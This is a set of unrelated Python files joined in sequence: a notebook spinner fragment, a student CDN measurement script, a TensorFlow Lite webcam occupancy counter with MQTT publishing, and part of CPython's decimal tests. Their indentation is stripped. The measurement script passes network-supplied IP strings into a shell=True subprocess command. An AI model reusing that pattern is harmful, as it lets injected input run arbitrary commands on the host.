output = '\r{0}'.format(frame)
with self.output:
self.output.outputs += self._output(output)
def start(self, text=None):
if text is not None:
self.text = text
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide()
self.output = self._make_output_widget()
from IPython.display import display
display(self.output)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self._enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
self.stop()
output = '\r{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
with self.output:
self.output.outputs = self._output(output)
|
active_measurements.py
|
import socket
import urlparse
import os
import sys
import threading
import Queue
import subprocess
import time
import errno
DNS_PORT_SEND = 51004
DNS_PORT_RECV = 51003
DNS_HOST = socket.gethostbyname('cs5700cdnproject.ccs.neu.edu')
# Initiates active measurements
def active_measurements():
pipe = Queue.Queue()
# global clients, clients_lock
# clients = set()
# clients_lock = threading.Lock()
# t1 = threading.Thread(target=get_new_clients, args=(pipe,))
# t2 = threading.Thread(target=send_measurements, args=(pipe,))
global dns_socket_send
dns_socket_send = dns_socket_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
get_new_clients(pipe)
# t1.start()
# t2.start()
#data format: 'token1$token2$tokenn'
# Fetches data from DNS server.
def get_new_clients(pipe):
connected = False
new = ''
data = None
dns_socket_recv = None
buff_size = 65535
clients = set()
while True:
if not connected:
try:
dns_socket_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dns_socket_recv.connect((DNS_HOST, DNS_PORT_RECV))
dns_socket_recv.setblocking(0)
connected = True
except socket.error as e:
pass
try:
if connected:
data = dns_socket_recv.recv(buff_size)
new = data
# print('Recieved from DNS: ' + data)
except socket.error as se:
errnum = se.args[0]
if errnum == errno.EPIPE:
connected = False
# print('this:' + str(new))
if new != '':
# print(new)
# time.sleep(3)
new = filter(lambda x: x!='', new.split('$'))
for ip in new:
# if ip not in clients:
# print('new ip: ' + ip)
clients.add(ip)
new = ''
if len(clients) > 0:
send_measurements(clients)
# if pipe.empty():
# pipe.put(clients)
# new = ''
# print(list(pipe.queue))
# if data == '':
# connected = False
# Sends back the scamper ping results to DNS server.
def send_measurements(ip_list):
fp = open('ips', 'w+')
fp.write('\n')
fp.close()
connected = True
results = ''
global dns_socket_send
while True:
if len(ip_list) > 0:
# print('in')
results = scamper(list(ip_list))
try:
dns_socket_send.send(results)
except socket.error as se:
errnum = se.args[0]
if errnum == errno.EPIPE:
connected = False
if len(ip_list) > 0:
fp = open('ips', 'w+')
fp.write(str(results) + '\n')
fp.close()
# print('Scamper results:\n' + str(results))
if not connected:
try:
dns_socket_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dns_socket_send.connect((DNS_HOST, DNS_PORT_SEND))
connected = True
# print('send_measurements: connected')
except socket.error as e:
pass
else:
break
# Executes a command as a subprocess.
def execute_command(command):
#import subprocess
return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
# Gives the result from the scamper pings to the given list of IPs.
def scamper(ip_list):
comm = '/usr/local/bin/scamper -c "ping -c 1" -p 1 -i ' + ' '.join(ip_list)
results = execute_command(comm)
return data_from_results(results)
# Parses the scamper results and fetches the data.
def data_from_results(results):
results = results.split('\n')
data = ''
length = len(results)
i = 0
packets_delivered = None
while i < length:
if results[i].startswith('--- '):
data += results[i].split()[1] + ' '
packets_delivered = results[i+1].split()[3]
if packets_delivered == '0':
data += 'inf'
i += 2
elif packets_delivered == '1':
data += results[i+2].split(' = ')[1].split('/')[0] + '\n'
i += 3
else:
i += 1
return data
# Beginning of execution,
def main():
port = int(sys.argv[1])
global DNS_PORT_SEND, DNS_PORT_RECV
if port > 40000:
if port > 50000:
if port > 60000:
if port > 2**16:
pass
else:
#60k - 2**16
DNS_PORT_SEND = port - 15328
DNS_PORT_RECV = port - 15329
else:
#50k - 60k
DNS_PORT_SEND = port - 10528
DNS_PORT_RECV = port - 10529
else:
#40k-50k
DNS_PORT_SEND = port + 15329
DNS_PORT_RECV = port + 15328
else:
#< 40k
pass
# print('dps:' + str(DNS_PORT_SEND))
# print('1:' + str(DNS_PORT_SEND))
# print('2:' + str(DNS_PORT_RECV))
active_measurements()
if __name__ == '__main__':
main()
|
people_detector.py
|
######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 10/27/19
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a live webcam
# feed. It draws boxes and scores around the objects of interest in each frame from the
# webcam. To improve FPS, the webcam object runs in a separate thread from the main program.
# This script will work with either a Picamera or regular USB webcam.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
import os
import argparse
import cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
from utils.data_tracker import *
from utils.mqtt_client import *
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
"""Camera object that controls video streaming from the Picamera"""
def __init__(self,resolution=(640,480),framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3,resolution[0])
ret = self.stream.set(4,resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
parser.add_argument('--record', help='Use a VideoWriter to record and save the output',
action='store_true') ### ADD RECORD ARGUMENT - JACOB HAGAN
parser.add_argument('--showdisplay', help='Displays output with cv2',
action='store_true') ### ADD DISPLAY ARGUMENT - JACOB HAGAN
parser.add_argument('--broker-ip', help='IP Address of the MQTT Broker. If no IP is specified, MQTT will not be used.',
default=None) ###ADDED BY COREY CLINE
parser.add_argument('--client_name', help='Name of the MQTT Client Session. Default session is TX1.',
default='TX1') ###ADDED BY COREY CLINE
parser.add_argument('--topic', help='MQTT topic to publish data to. Default topic is test/occupancy.',
default='test/occupancy')
parser.add_argument('--publish-interval', help='Interval in seconds to publish to MQTT topic. Default interval is 10s.',
default=10) ###ADDED BY COREY CLINE
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
use_VideoWriter = args.record ### INITIALIZE VIDEOWRITER FLAG - JACOB HAGAN
showdisplay = args.showdisplay ### INITIALIZE DISPLAY FLAG - JACOB HAGAN
broker_ip = args.broker_ip ###ADDED BY COREY CLINE
client_name = args.client_name ###ADDED BY COREY CLINE
mqtt_topic = args.topic ###ADDED BY COREY CLINE
publish_interval = int(args.publish_interval) ###ADDED BY COREY CLINE
# Validate MQTT input arguments here - COREY CLINE
if broker_ip == None:
if mqtt_topic != "test/occupancy":
raise Exception( "Must specify a broker_ip to publish to a topic. " + \
"Use --broker-ip argument to connect to a broker." )
if client_name != "TX1":
raise Exception( "Must specify a broker_ip for a client_name. "+ \
"Use --broker-ip argument to connect to a broker." )
if publish_interval != 10:
raise Exception( "Must specify a broker_ip to publish at a given " + \
"interval. Use --broker-ip argument to connect " + \
"to a broker." )
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if (GRAPH_NAME == 'detect.tflite'):
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
# If the user wants to record the output, initialize the VideoWriter object - JACOB HAGAN
if use_VideoWriter:
writer = cv2.VideoWriter( "output/output.avi", cv2.VideoWriter_fourcc( *"MJPG" ), 4, (imW,imH) ) ### ADDED HERE TO SAVE VIDEO AS FILE - COREY CLINE
# Initialize data tracker and MQTT Client - ADDED BY COREY CLINE
if broker_ip:
pub_timer = time.perf_counter() ### INITIALIZE PUBLISH TIMER - ADDED BY COREY CLINE
tracker = DataTracker()
TX1_client = MQTTClient( broker_ip, client_name )
TX1_client.connect()
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame = cv2.flip( frame, -1 ) ### ADDED HERE TO FLIP IMAGE FROM VIDEO STREAM - COREY CLINE
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
#num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
# Track number of occupants - ADDED BY COREY CLINE
num_occupants = 0
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Count for People - ADDED BY COREY CLINE
if ( object_name == "person" ):
num_occupants += 1
# Draw framerate in corner of frame (Draw occupant number in corner of frame ADDED BY COREY CLINE)
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
cv2.putText(frame, 'PEOPLE: {}'.format(num_occupants),(30,90),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
if not showdisplay: ### IF DISPLAY FLAG IS NOT TRUE, PRINT DETECTION OUTPUT TO CONSOLE - JACOB HAGAN
print( "FPS: {0:.2f}".format(frame_rate_calc) + "\tPEOPLE: {}".format(num_occupants)) ### PRINT RESULTS TO CONSOLE - ADDED BY COREY CLINE
# All the results have been drawn on the frame, so it's time to display it.
if use_VideoWriter:
writer.write( frame ) ### ADDED HERE TO WRITE THE CURRENT FRAME TO THE VIDEO FILE - COREY CLINE
if showdisplay:
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Check for a broker connection before publishing - COREY CLINE
if broker_ip:
time_passed = time.perf_counter() - pub_timer ### ADDED BY COREY CLINE
# Add data point to tracker - ADDED BY COREY CLINE
tracker.add_point( num_occupants )
# Check mqtt publish timer - ADDED BY COREY CLINE
if ( time_passed ) > publish_interval:
mode = tracker.get_mode()
tracker.clear_data()
TX1_client.client.loop_start()
TX1_client.publish( mqtt_topic, mode, qos = 2, retain = False )
TX1_client.client.loop_stop()
print( "PEOPLE: {}".format( mode ) )
pub_timer = time.perf_counter()
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
# Clean up
cv2.destroyAllWindows()
videostream.stop()
if use_VideoWriter:
writer.release() ### ADDED HERE TO RELEASE THE VIDEO WRITER AND SAVE THE FILE - COREY CLINE
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
import warnings
import inspect
try:
import threading
except ImportError:
threading = None
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# unicode whitespace
